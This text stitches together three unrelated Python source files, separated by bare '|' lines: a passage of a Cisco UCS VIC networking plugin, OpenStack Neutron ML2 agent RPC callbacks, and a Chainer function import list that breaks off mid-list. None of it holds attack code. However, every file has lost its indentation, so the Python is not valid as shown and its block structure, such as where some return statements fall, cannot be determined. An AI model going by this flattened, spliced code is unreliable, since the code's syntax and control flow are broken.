if the port contains a remote interface attachment,
the remote interface should first be un-plugged and
then the port can be deleted.
"""
LOG.debug("UCSVICPlugin:delete_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
ucs_inventory = kwargs[const.UCS_INVENTORY]
chassis_id = kwargs[const.CHASSIS_ID]
blade_id = kwargs[const.BLADE_ID]
interface_dn = kwargs[const.BLADE_INTF_DN]
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
self._delete_port_profile(port_id, profile_name)
ucs_inventory.unreserve_blade_interface(self._ucsm_ip, chassis_id,
blade_id, interface_dn)
return udb.remove_portbinding(port_id)
def update_port(self, tenant_id, net_id, port_id, **kwargs):
"""
Updates the state of a port on the specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:update_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
def get_port_details(self, tenant_id, net_id, port_id, **kwargs):
"""
This method allows the user to retrieve a remote interface
that is attached to this particular port.
"""
LOG.debug("UCSVICPlugin:get_port_details() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
return port_binding
def plug_interface(self, tenant_id, net_id, port_id, remote_interface_id,
**kwargs):
"""
Attaches a remote interface to the specified port on the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:plug_interface() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
old_vlan_name = port_binding[const.VLANNAME]
new_vlan_name = self._get_vlan_name_for_network(tenant_id, net_id)
new_vlan_id = self._get_vlan_id_for_network(tenant_id, net_id)
self._driver.change_vlan_in_profile(profile_name, old_vlan_name,
new_vlan_name, self._ucsm_ip,
self._ucsm_username,
self._ucsm_password)
return udb.update_portbinding(port_id, vlan_name=new_vlan_name,
vlan_id=new_vlan_id)
def unplug_interface(self, tenant_id, net_id, port_id, **kwargs):
"""
Detaches a remote interface from the specified port on the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:unplug_interface() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
old_vlan_name = port_binding[const.VLANNAME]
new_vlan_name = conf.DEFAULT_VLAN_NAME
self._driver.change_vlan_in_profile(profile_name, old_vlan_name,
new_vlan_name, self._ucsm_ip,
self._ucsm_username,
self._ucsm_password)
return udb.update_portbinding(port_id, vlan_name=new_vlan_name,
vlan_id=conf.DEFAULT_VLAN_ID)
def create_multiport(self, tenant_id, net_id_list, ports_num,
port_id_list, **kwargs):
"""
        Creates multiple ports, one on each of the specified
        Virtual Networks.
"""
LOG.debug("UCSVICPlugin:create_multiport() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
qos = None
ucs_inventory = kwargs[const.UCS_INVENTORY]
least_rsvd_blade_dict = kwargs[const.LEAST_RSVD_BLADE_DICT]
chassis_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_CHASSIS]
blade_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_ID]
blade_data_dict = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_DATA]
port_binding_list = []
for port_id, net_id in zip(port_id_list, net_id_list):
new_port_profile = self._create_port_profile(
tenant_id, net_id, port_id,
conf.DEFAULT_VLAN_NAME,
conf.DEFAULT_VLAN_ID)
profile_name = new_port_profile[const.PROFILE_NAME]
rsvd_nic_dict = ucs_inventory.reserve_blade_interface(
self._ucsm_ip, chassis_id,
blade_id, blade_data_dict,
tenant_id, port_id,
profile_name)
port_binding = udb.update_portbinding(
port_id,
portprofile_name=profile_name,
vlan_name=conf.DEFAULT_VLAN_NAME,
vlan_id=conf.DEFAULT_VLAN_ID,
qos=qos)
port_binding_list.append(port_binding)
return port_binding_list
def detach_port(self, tenant_id, instance_id, instance_desc, **kwargs):
"""
Remove the association of the VIF with the dynamic vnic
"""
LOG.debug("detach_port() called\n")
port_id = kwargs[const.PORTID]
kwargs.pop(const.PORTID)
return self.unplug_interface(tenant_id, None, port_id, **kwargs)
def _get_profile_name(self, port_id):
"""Returns the port profile name based on the port UUID"""
profile_name = conf.PROFILE_NAME_PREFIX + cutil.get16ByteUUID(port_id)
return profile_name
def _get_vlan_name_for_network(self, tenant_id, network_id):
"""Return the VLAN name as set by the L2 network plugin"""
vlan_binding = cdb.get_vlan_binding(network_id)
return vlan_binding[const.VLANNAME]
def _get_vlan_id_for_network(self, tenant_id, network_id):
"""Return the VLAN id as set by the L2 network plugin"""
vlan_binding = cdb.get_vlan_binding(network_id)
return vlan_binding[const.VLANID]
def _create_port_profile(self, tenant_id, net_id, port_id, vlan_name,
vlan_id):
"""Create port profile in UCSM"""
if self._port_profile_counter >= int(conf.MAX_UCSM_PORT_PROFILES):
raise cexc.UCSMPortProfileLimit(net_id=net_id, port_id=port_id)
profile_name = self._get_profile_name(port_id)
self._driver.create_profile(profile_name, vlan_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
self._port_profile_counter += 1
new_port_profile = {const.PROFILE_NAME: profile_name,
const.PROFILE_VLAN_NAME: vlan_name,
const.PROFILE_VLAN_ID: vlan_id}
return new_port_profile
def _delete_port_profile(self, port_id, profile_name):
"""Delete port profile in UCSM"""
self._driver.delete_profile(profile_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
self._port_profile_counter -= 1
def _set_ucsm(self, ucsm_ip):
"""Set the UCSM IP, username, and password"""
self._ucsm_ip = ucsm_ip
self._ucsm_username = cred.Store.get_username(conf.UCSM_IP_ADDRESS)
self._ucsm_password = cred.Store.get_password(conf.UCSM_IP_ADDRESS)
|
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import port_security as psec
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib.plugins import directory
from neutron_lib.plugins.ml2 import api
from neutron_lib.services.qos import constants as qos_consts
from oslo_log import log
import oslo_messaging
from sqlalchemy.orm import exc
from neutron.api.rpc.handlers import dvr_rpc
from neutron.api.rpc.handlers import securitygroups_rpc as sg_rpc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron.db import l3_hamode_db
from neutron.db import provisioning_blocks
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2.drivers import type_tunnel
# REVISIT(kmestery): Allow the type and mechanism drivers to supply the
# mixins and eventually remove the direct dependencies on type_tunnel.
LOG = log.getLogger(__name__)
class RpcCallbacks(type_tunnel.TunnelRpcCallbackMixin):
# history
# 1.0 Initial version (from openvswitch/linuxbridge)
# 1.1 Support Security Group RPC
# 1.2 Support get_devices_details_list
# 1.3 get_device_details rpc signature upgrade to obtain 'host' and
# return value to include fixed_ips and device_owner for
# the device port
# 1.4 tunnel_sync rpc signature upgrade to obtain 'host'
# 1.5 Support update_device_list and
# get_devices_details_list_and_failed_devices
target = oslo_messaging.Target(version='1.5')
def __init__(self, notifier, type_manager):
self.setup_tunnel_callback_mixin(notifier, type_manager)
super(RpcCallbacks, self).__init__()
def _get_new_status(self, host, port_context):
port = port_context.current
if not host or host == port_context.host:
new_status = (n_const.PORT_STATUS_BUILD if port['admin_state_up']
else n_const.PORT_STATUS_DOWN)
if port['status'] != new_status:
return new_status
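    # _get_new_status() in a nutshell: for a port bound to this host (or when
    # no host is given), admin_state_up=True maps to PORT_STATUS_BUILD and
    # False to PORT_STATUS_DOWN; it returns None when the status already
    # matches or the request names a different host.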
def get_device_details(self, rpc_context, **kwargs):
"""Agent requests device details."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
# cached networks used for reducing number of network db calls
# for server internal usage only
cached_networks = kwargs.get('cached_networks')
LOG.debug("Device %(device)s details requested by agent "
"%(agent_id)s with host %(host)s",
{'device': device, 'agent_id': agent_id, 'host': host})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port_context = plugin.get_bound_port_context(rpc_context,
port_id,
host,
cached_networks)
if not port_context:
LOG.debug("Device %(device)s requested by agent "
"%(agent_id)s not found in database",
{'device': device, 'agent_id': agent_id})
return {'device': device}
port = port_context.current
# caching information about networks for future use
if cached_networks is not None:
if port['network_id'] not in cached_networks:
cached_networks[port['network_id']] = (
port_context.network.current)
result = self._get_device_details(rpc_context, agent_id=agent_id,
host=host, device=device,
port_context=port_context)
if 'network_id' in result:
# success so we update status
new_status = self._get_new_status(host, port_context)
if new_status:
plugin.update_port_status(rpc_context,
port_id,
new_status,
host,
port_context.network.current)
return result
def _get_device_details(self, rpc_context, agent_id, host, device,
port_context):
segment = port_context.bottom_bound_segment
port = port_context.current
if not segment:
LOG.warning("Device %(device)s requested by agent "
"%(agent_id)s on network %(network_id)s not "
"bound, vif_type: %(vif_type)s",
{'device': device,
'agent_id': agent_id,
'network_id': port['network_id'],
'vif_type': port_context.vif_type})
return {'device': device}
network_qos_policy_id = port_context.network._network.get(
qos_consts.QOS_POLICY_ID)
entry = {'device': device,
'network_id': port['network_id'],
'port_id': port['id'],
'mac_address': port['mac_address'],
'admin_state_up': port['admin_state_up'],
'network_type': segment[api.NETWORK_TYPE],
'segmentation_id': segment[api.SEGMENTATION_ID],
'physical_network': segment[api.PHYSICAL_NETWORK],
'mtu': port_context.network._network.get('mtu'),
'fixed_ips': port['fixed_ips'],
'device_owner': port['device_owner'],
'allowed_address_pairs': port['allowed_address_pairs'],
'port_security_enabled': port.get(psec.PORTSECURITY, True),
'qos_policy_id': port.get(qos_consts.QOS_POLICY_ID),
'network_qos_policy_id': network_qos_policy_id,
'profile': port[portbindings.PROFILE]}
LOG.debug("Returning: %s", entry)
return entry
def get_devices_details_list(self, rpc_context, **kwargs):
# cached networks used for reducing number of network db calls
cached_networks = {}
return [
self.get_device_details(
rpc_context,
device=device,
cached_networks=cached_networks,
**kwargs
)
for device in kwargs.pop('devices', [])
]
def get_devices_details_list_and_failed_devices(self,
rpc_context,
**kwargs):
devices = []
failed_devices = []
devices_to_fetch = kwargs.pop('devices', [])
plugin = directory.get_plugin()
host = kwargs.get('host')
bound_contexts = plugin.get_bound_ports_contexts(rpc_context,
devices_to_fetch,
host)
for device in devices_to_fetch:
if not bound_contexts.get(device):
                # device has no bound port context in the database
LOG.debug("Device %(device)s requested by agent "
"%(agent_id)s not found in database",
{'device': device,
'agent_id': kwargs.get('agent_id')})
devices.append({'device': device})
continue
try:
devices.append(self._get_device_details(
rpc_context,
agent_id=kwargs.get('agent_id'),
host=host,
device=device,
port_context=bound_contexts[device]))
except Exception:
LOG.exception("Failed to get details for device %s",
device)
failed_devices.append(device)
new_status_map = {ctxt.current['id']: self._get_new_status(host, ctxt)
for ctxt in bound_contexts.values() if ctxt}
# filter out any without status changes
new_status_map = {p: s for p, s in new_status_map.items() if s}
try:
plugin.update_port_statuses(rpc_context, new_status_map, host)
except Exception:
LOG.exception("Failure updating statuses, retrying all")
failed_devices = devices_to_fetch
devices = []
return {'devices': devices,
'failed_devices': failed_devices}
def update_device_down(self, rpc_context, **kwargs):
"""Device no longer exists on agent."""
# TODO(garyk) - live migration and port status
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
LOG.debug("Device %(device)s no longer exists at agent "
"%(agent_id)s",
{'device': device, 'agent_id': agent_id})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port_exists = True
if (host and not plugin.port_bound_to_host(rpc_context,
port_id, host)):
LOG.debug("Device %(device)s not bound to the"
" agent host %(host)s",
{'device': device, 'host': host})
else:
try:
port_exists = bool(plugin.update_port_status(
rpc_context, port_id, n_const.PORT_STATUS_DOWN, host))
except exc.StaleDataError:
port_exists = False
LOG.debug("delete_port and update_device_down are being "
"executed concurrently. Ignoring StaleDataError.")
return {'device': device,
'exists': port_exists}
self.notify_l2pop_port_wiring(port_id, rpc_context,
n_const.PORT_STATUS_DOWN, host)
return {'device': device,
'exists': port_exists}
def update_device_up(self, rpc_context, **kwargs):
"""Device is up on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
LOG.debug("Device %(device)s up at agent %(agent_id)s",
{'device': device, 'agent_id': agent_id})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port = plugin.port_bound_to_host(rpc_context, port_id, host)
if host and not port:
LOG.debug("Device %(device)s not bound to the"
" agent host %(host)s",
{'device': device, 'host': host})
# this might mean that a VM is in the process of live migration
# and vif was plugged on the destination compute node;
# need to notify nova explicitly
port = ml2_db.get_port(rpc_context, port_id)
# _device_to_port_id may have returned a truncated UUID if the
# agent did not provide a full one (e.g. Linux Bridge case).
if not port:
LOG.debug("Port %s not found, will not notify nova.", port_id)
return
else:
if port.device_owner.startswith(
n_const.DEVICE_OWNER_COMPUTE_PREFIX):
plugin.nova_notifier.notify_port_active_direct(port)
return
else:
self.update_port_status_to_active(port, rpc_context, port_id, host)
self.notify_l2pop_port_wiring(port_id, rpc_context,
n_const.PORT_STATUS_ACTIVE, host)
def update_port_status_to_active(self, port, rpc_context, port_id, host):
plugin = directory.get_plugin()
if port and port['device_owner'] == n_const.DEVICE_OWNER_DVR_INTERFACE:
# NOTE(kevinbenton): we have to special case DVR ports because of
# the special multi-binding status update logic they have that
# depends on the host
plugin.update_port_status(rpc_context, port_id,
n_const.PORT_STATUS_ACTIVE, host)
else:
# _device_to_port_id may have returned a truncated UUID if the
# agent did not provide a full one (e.g. Linux Bridge case). We
# need to look up the full one before calling provisioning_complete
if not port:
port = ml2_db.get_port(rpc_context, port_id)
if not port:
# port doesn't exist, no need to add a provisioning block
return
provisioning_blocks.provisioning_complete(
rpc_context, port['id'], resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
def notify_l2pop_port_wiring(self, port_id, rpc_context,
status, host):
"""Notify the L2pop driver that a port has been wired/unwired.
The L2pop driver uses this notification to broadcast forwarding
entries to other agents on the same network as the port for port_id.
"""
plugin = directory.get_plugin()
l2pop_driver = plugin.mechanism_manager.mech_drivers.get(
'l2population')
if not l2pop_driver:
return
port = ml2_db.get_port(rpc_context, port_id)
if not port:
return
# NOTE: DVR ports are already handled and updated through l2pop
# and so we don't need to update it again here
if port['device_owner'] == n_const.DEVICE_OWNER_DVR_INTERFACE:
return
port_context = plugin.get_bound_port_context(
rpc_context, port_id)
if not port_context:
# port deleted
return
port = port_context.current
if (status == n_const.PORT_STATUS_ACTIVE and
port[portbindings.HOST_ID] != host and
not l3_hamode_db.is_ha_router_port(rpc_context,
port['device_owner'],
port['device_id'])):
# don't setup ACTIVE forwarding entries unless bound to this
# host or if it's an HA port (which is special-cased in the
# mech driver)
return
port_context.current['status'] = status
port_context.current[portbindings.HOST_ID] = host
if status == n_const.PORT_STATUS_ACTIVE:
l2pop_driver.obj.update_port_up(port_context)
else:
l2pop_driver.obj.update_port_down(port_context)
def update_device_list(self, rpc_context, **kwargs):
devices_up = []
failed_devices_up = []
devices_down = []
failed_devices_down = []
devices = kwargs.get('devices_up')
if devices:
for device in devices:
try:
self.update_device_up(
rpc_context,
device=device,
**kwargs)
except Exception:
failed_devices_up.append(device)
LOG.error("Failed to update device %s up", device)
else:
devices_up.append(device)
devices = kwargs.get('devices_down')
if devices:
for device in devices:
try:
dev = self.update_device_down(
rpc_context,
device=device,
**kwargs)
except Exception:
failed_devices_down.append(device)
LOG.error("Failed to update device %s down", device)
else:
devices_down.append(dev)
return {'devices_up': devices_up,
'failed_devices_up': failed_devices_up,
'devices_down': devices_down,
'failed_devices_down': failed_devices_down}
class AgentNotifierApi(dvr_rpc.DVRAgentRpcApiMixin,
sg_rpc.SecurityGroupAgentRpcApiMixin,
type_tunnel.TunnelAgentRpcApiMixin):
"""Agent side of the openvswitch rpc API.
API version history:
1.0 - Initial version.
1.1 - Added get_active_networks_info, create_dhcp_port,
update_dhcp_port, and removed get_dhcp_port methods.
1.4 - Added network_update
"""
def __init__(self, topic):
self.topic = topic
self.topic_network_delete = topics.get_topic_name(topic,
topics.NETWORK,
topics.DELETE)
self.topic_port_update = topics.get_topic_name(topic,
topics.PORT,
topics.UPDATE)
self.topic_port_delete = topics.get_topic_name(topic,
topics.PORT,
topics.DELETE)
self.topic_network_update = topics.get_topic_name(topic,
topics.NETWORK,
topics.UPDATE)
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def network_delete(self, context, network_id):
cctxt = self.client.prepare(topic=self.topic_network_delete,
fanout=True)
cctxt.cast(context, 'network_delete', network_id=network_id)
def port_update(self, context, port, network_type, segmentation_id,
physical_network):
cctxt = self.client.prepare(topic=self.topic_port_update,
fanout=True)
cctxt.cast(context, 'port_update', port=port,
network_type=network_type, segmentation_id=segmentation_id,
physical_network=physical_network)
def port_delete(self, context, port_id):
cctxt = self.client.prepare(topic=self.topic_port_delete,
fanout=True)
cctxt.cast(context, 'port_delete', port_id=port_id)
def network_update(self, context, network):
cctxt = self.client.prepare(topic=self.topic_network_update,
fanout=True, version='1.4')
cctxt.cast(context, 'network_update', network=network)
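# Illustrative fan-out notification (a sketch; passing topics.AGENT is the
# usual wiring done by the ML2 plugin, but that setup is an assumption here):
#   notifier = AgentNotifierApi(topics.AGENT)
#   notifier.port_delete(context, port_id='...')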
|
|
"""Collection of function implementations.
Functions are either implemented as :class:`~chainer.Function`\\ s or
:class:`~chainer.FunctionNode`\\ s.
"""
from chainer.functions.activation.clipped_relu import clipped_relu # NOQA
from chainer.functions.activation.clipped_relu import ClippedReLU # NOQA
from chainer.functions.activation.crelu import crelu # NOQA
from chainer.functions.activation.crelu import CReLU # NOQA
from chainer.functions.activation.elu import elu # NOQA
from chainer.functions.activation.elu import ELU # NOQA
from chainer.functions.activation.hard_sigmoid import hard_sigmoid # NOQA
from chainer.functions.activation.hard_sigmoid import HardSigmoid # NOQA
from chainer.functions.activation.leaky_relu import leaky_relu # NOQA
from chainer.functions.activation.leaky_relu import LeakyReLU # NOQA
from chainer.functions.activation.log_softmax import log_softmax # NOQA
from chainer.functions.activation.log_softmax import LogSoftmax # NOQA
from chainer.functions.activation.lstm import lstm # NOQA
from chainer.functions.activation.lstm import LSTM # NOQA
from chainer.functions.activation.maxout import maxout # NOQA
from chainer.functions.activation.prelu import prelu # NOQA
from chainer.functions.activation.relu import relu # NOQA
from chainer.functions.activation.relu import ReLU # NOQA
from chainer.functions.activation.selu import selu # NOQA
from chainer.functions.activation.sigmoid import sigmoid # NOQA
from chainer.functions.activation.sigmoid import Sigmoid # NOQA
from chainer.functions.activation.slstm import slstm # NOQA
from chainer.functions.activation.slstm import SLSTM # NOQA
from chainer.functions.activation.softmax import softmax # NOQA
from chainer.functions.activation.softmax import Softmax # NOQA
from chainer.functions.activation.softplus import softplus # NOQA
from chainer.functions.activation.softplus import Softplus # NOQA
from chainer.functions.activation.swish import swish # NOQA
from chainer.functions.activation.tanh import tanh # NOQA
from chainer.functions.activation.tanh import Tanh # NOQA
from chainer.functions.activation.tree_lstm import tree_lstm # NOQA
from chainer.functions.array.broadcast import broadcast # NOQA
from chainer.functions.array.broadcast import Broadcast # NOQA
from chainer.functions.array.broadcast import broadcast_to # NOQA
from chainer.functions.array.broadcast import BroadcastTo # NOQA
from chainer.functions.array.cast import cast # NOQA
from chainer.functions.array.cast import Cast # NOQA
from chainer.functions.array.concat import concat # NOQA
from chainer.functions.array.concat import Concat # NOQA
from chainer.functions.array.copy import copy # NOQA
from chainer.functions.array.copy import Copy # NOQA
from chainer.functions.array.depth2space import depth2space # NOQA
from chainer.functions.array.depth2space import Depth2Space # NOQA
from chainer.functions.array.dstack import dstack # NOQA
from chainer.functions.array.expand_dims import expand_dims # NOQA
from chainer.functions.array.expand_dims import ExpandDims # NOQA
from chainer.functions.array.flatten import flatten # NOQA
from chainer.functions.array.flip import flip # NOQA
from chainer.functions.array.flip import Flip # NOQA
from chainer.functions.array.fliplr import fliplr # NOQA
from chainer.functions.array.fliplr import FlipLR # NOQA
from chainer.functions.array.flipud import flipud # NOQA
from chainer.functions.array.flipud import FlipUD # NOQA
from chainer.functions.array.get_item import get_item # NOQA
from chainer.functions.array.get_item import GetItem # NOQA
from chainer.functions.array.hstack import hstack # NOQA
from chainer.functions.array.im2col import im2col # NOQA
from chainer.functions.array.im2col import Im2Col # NOQA
from chainer.functions.array.pad import pad # NOQA
from chainer.functions.array.pad import Pad # NOQA
from chainer.functions.array.pad_sequence import pad_sequence # NOQA
from chainer.functions.array.pad_sequence import PadSequence # NOQA
from chainer.functions.array.permutate import permutate # NOQA
from chainer.functions.array.permutate import Permutate # NOQA
from chainer.functions.array.repeat import repeat # NOQA
from chainer.functions.array.reshape import reshape # NOQA
from chainer.functions.array.reshape import Reshape # NOQA
from chainer.functions.array.resize_images import resize_images # NOQA
from chainer.functions.array.resize_images import ResizeImages # NOQA
from chainer.functions.array.rollaxis import rollaxis # NOQA
from chainer.functions.array.rollaxis import Rollaxis # NOQA
from chainer.functions.array.scatter_add import scatter_add # NOQA
from chainer.functions.array.select_item import select_item # NOQA
from chainer.functions.array.select_item import SelectItem # NOQA
from chainer.functions.array.separate import separate # NOQA
from chainer.functions.array.space2depth import space2depth # NOQA
from chainer.functions.array.space2depth import Space2Depth # NOQA
from chainer.functions.array.spatial_transformer_grid import spatial_transformer_grid # NOQA
from chainer.functions.array.spatial_transformer_grid import SpatialTransformerGrid # NOQA
from chainer.functions.array.spatial_transformer_sampler import spatial_transformer_sampler # NOQA
from chainer.functions.array.spatial_transformer_sampler import SpatialTransformerSampler # NOQA
from chainer.functions.array.split_axis import split_axis # NOQA
from chainer.functions.array.split_axis import SplitAxis # NOQA
from chainer.functions.array.squeeze import squeeze # NOQA
from chainer.functions.array.squeeze import Squeeze # NOQA
from chainer.functions.array.stack import stack # NOQA
from chainer.functions.array.swapaxes import swapaxes # NOQA
from chainer.functions.array.swapaxes import Swapaxes # NOQA
from chainer.functions.array.tile import tile # NOQA
from chainer.functions.array.tile import Tile # NOQA
from chainer.functions.array.transpose import transpose # NOQA
from chainer.functions.array.transpose import Transpose # NOQA
from chainer.functions.array.transpose_sequence import transpose_sequence # NOQA
from chainer.functions.array.transpose_sequence import TransposeSequence # NOQA
from chainer.functions.array.vstack import vstack # NOQA
from chainer.functions.array.where import where # NOQA
from chainer.functions.array.where import Where # NOQA
from chainer.functions.connection.bilinear import bilinear # NOQA
from chainer.functions.connection.convolution_2d import convolution_2d # NOQA
from chainer.functions.connection.convolution_nd import convolution_nd # NOQA
from chainer.functions.connection.deconvolution_2d import deconvolution_2d # NOQA
from chainer.functions.connection.deconvolution_nd import deconvolution_nd # NOQA
from chainer.functions.connection.depthwise_convolution_2d import depthwise_convolution_2d # NOQA
from chainer.functions.connection.dilated_convolution_2d import dilated_convolution_2d # NOQA
from chainer.functions.connection.embed_id import embed_id # NOQA
from chainer.functions.connection.linear import linear # NOQA
from chainer.functions.connection.local_convolution_2d import local_convolution_2d # NOQA
from chainer.functions.connection.n_step_gru import n_step_bigru # NOQA
from chainer.functions.connection.n_step_gru import n_step_gru # NOQA
from chainer.functions.connection.n_step_gru import NStepBiGRU # NOQA
from chainer.functions.connection.n_step_gru import NStepGRU # NOQA
from chainer.functions.connection.n_step_lstm import n_step_bilstm # NOQA
from chainer.functions.connection.n_step_lstm import n_step_lstm # NOQA
from chainer.functions.connection.n_step_lstm import NStepBiLSTM # NOQA
from chainer.functions.connection.n_step_lstm import NStepLSTM # NOQA
from chainer.functions.connection.n_step_rnn import n_step_birnn # NOQA
from chainer.functions.connection.n_step_rnn import n_step_rnn # NOQA
from chainer.functions.connection.n_step_rnn import NStepBiRNNReLU # NOQA
from chainer.functions.connection.n_step_rnn import NStepBiRNNTanh # NOQA
from chainer.functions.connection.n_step_rnn import NStepRNNReLU # NOQA
from chainer.functions.connection.n_step_rnn import NStepRNNTanh # NOQA
from chainer.functions.connection.shift import shift # NOQA
from chainer.functions.evaluation.accuracy import accuracy # NOQA
from chainer.functions.evaluation.accuracy import Accuracy # NOQA
from chainer.functions.evaluation.binary_accuracy import binary_accuracy # NOQA
from chainer.functions.evaluation.binary_accuracy import BinaryAccuracy # NOQA
from chainer.functions.evaluation.classification_summary import classification_summary # NOQA
from chainer.functions.evaluation.classification_summary import ClassificationSummary # NOQA
from chainer.functions.evaluation.classification_summary import f1_score # NOQA
from chainer.functions.evaluation.classification_summary import precision # NOQA
from chainer.functions.evaluation.classification_summary import recall # NOQA
from chainer.functions.evaluation.r2_score import r2_score # NOQA
from chainer.functions.loss.absolute_error import absolute_error # NOQA
from chainer.functions.loss.absolute_error import AbsoluteError # NOQA
from chainer.functions.loss.black_out import black_out # NOQA
from chainer.functions.loss.contrastive import contrastive # NOQA
from chainer.functions.loss.contrastive import Contrastive # NOQA
from chainer.functions.loss.crf1d import argmax_crf1d # NOQA
from chainer.functions.loss.crf1d import crf1d # NOQA
from chainer.functions.loss.cross_covariance import cross_covariance # NOQA
from chainer.functions.loss.cross_covariance import CrossCovariance # NOQA
from chainer.functions.loss.ctc import connectionist_temporal_classification # NOQA
from chainer.functions.loss.ctc import ConnectionistTemporalClassification # NOQA
from chainer.functions.loss.decov import decov # NOQA
from chainer.functions.loss.decov import DeCov # NOQA
from chainer.functions.loss.hinge import hinge # NOQA
from chainer.functions.loss.hinge import Hinge # NOQA
from chainer.functions.loss.huber_loss import huber_loss # NOQA
from chainer.functions.loss.huber_loss import HuberLoss # NOQA
from chainer.functions.loss.mean_absolute_error import mean_absolute_error # NOQA
from chainer.functions.loss.mean_absolute_error import MeanAbsoluteError # NOQA
from chainer.functions.loss.mean_squared_error import mean_squared_error # NOQA
from chainer.functions.loss.mean_squared_error import MeanSquaredError # NOQA
from chainer.functions.loss.negative_sampling import negative_sampling # NOQA
from chainer.functions.loss.sigmoid_cross_entropy import sigmoid_cross_entropy # NOQA
from chainer.functions.loss.sigmoid_cross_entropy import SigmoidCrossEntropy # NOQA
from chainer.functions.loss.softmax_cross_entropy import softmax_cross_entropy # NOQA
from chainer.functions.loss.softmax_cross_entropy import SoftmaxCrossEntropy # NOQA
from chainer.functions.loss.squared_error import squared_error # NOQA
from chainer.functions.loss.squared_error import SquaredError # NOQA
from chainer.functions.loss.triplet import triplet # NOQA
from chainer.functions.loss.triplet import Triplet # NOQA
from chainer.functions.loss.vae import bernoulli_nll # NOQA
from chainer.functions.loss.vae import gaussian_kl_divergence # NOQA
from chainer.functions.loss.vae import gaussian_nll # NOQA
from chainer.functions.math.average import average # NOQA
from chainer.functions.math.basic_math import absolute # NOQA
from chainer.functions.math.basic_math import add # NOQA
from chainer.functions.math.batch_l2_norm_squared import batch_l2_norm_squared # NOQA
from chainer.functions.math.batch_l2_norm_squared import BatchL2NormSquared # NOQA
from chainer.functions.math.bias import bias # NOQA
from chainer.functions.math.ceil import ceil # NOQA
from chainer.functions.math.clip import clip # NOQA
from chainer.functions.math.clip import Clip # NOQA
from chainer.functions.math.cumsum import cumsum # NOQA
from chainer.functions.math.cumsum import Cumsum # NOQA
from chainer.functions.math.det import batch_det # NOQA
from chainer.functions.math.det import BatchDet # NOQA
from chainer.functions.math.det import det # NOQA
from chainer.functions.math.erf import erf # NOQA
from chainer.functions.math.erfc import erfc # NOQA
from chainer.functions.math.exponential import exp # NOQA
from chainer.functions.math.exponential import Exp # NOQA
from chainer.functions.math.exponential import log # NOQA
from chainer.functions.math.exponential import Log # NOQA
from chainer.functions.math.exponential import log10 # NOQA
from chainer.functions.math.exponential import Log10 # NOQA
from chainer.functions.math.exponential import log2 # NOQA
from chainer.functions.math.exponential import Log2 # NOQA
from chainer.functions.math.exponential_m1 import expm1 # NOQA
from chainer.functions.math.exponential_m1 import Expm1 # NOQA
from chainer.functions.math.fft import fft # NOQA
from chainer.functions.math.fft import ifft # NOQA
from chainer.functions.math.fix import fix # NOQA
from chainer.functions.math.floor import floor # NOQA
from chainer.functions.math.fmod import fmod # NOQA
from chainer.functions.math.fmod import Fmod # NOQA
from chainer.functions.math.hyperbolic import cosh # NOQA
from chainer.functions.math.hyperbolic import Cosh # NOQA
from chainer.functions.math.hyperbolic import sinh # NOQA
from chainer.functions.math.hyperbolic import Sinh # NOQA
from chainer.functions.math.identity import identity # NOQA
from chainer.functions.math.identity import Identity # NOQA
from chainer.functions.math.inv import batch_inv # NOQA
from chainer.functions.math.inv import BatchInv # NOQA
from chainer.functions.math.inv import inv # NOQA
from chainer.functions.math.inv import Inv # NOQA
from chainer.functions.math.linear_interpolate import linear_interpolate # NOQA
from chainer.functions.math.linear_interpolate import LinearInterpolate # NOQA
from chainer.functions.math.logarithm_1p import Log1p # NOQA
from chainer.functions.math.logarithm_1p import log1p # NOQA
from chainer.functions.math.logsumexp import logsumexp # NOQA
from chainer.functions.math.logsumexp import LogSumExp # NOQA
from chainer.functions.math.matmul import batch_matmul # NOQA
from chainer.functions.math.matmul import matmul # NOQA
from chainer.functions.math.matmul import MatMul # NOQA
from chainer.functions.math.maximum import maximum # NOQA
from chainer.functions.math.maximum import Maximum # NOQA
from chainer.functions.math.minimum import minimum # NOQA
from chainer.functions.math.minimum import Minimum # NOQA
from chainer.functions.math.minmax import argmax # NOQA
from chainer.functions.math.minmax import ArgMax # NOQA
from chainer.functions.math.minmax import argmin # NOQA
from chainer.functions.math.minmax import ArgMin # NOQA
from chainer.functions.math.minmax import max # NOQA
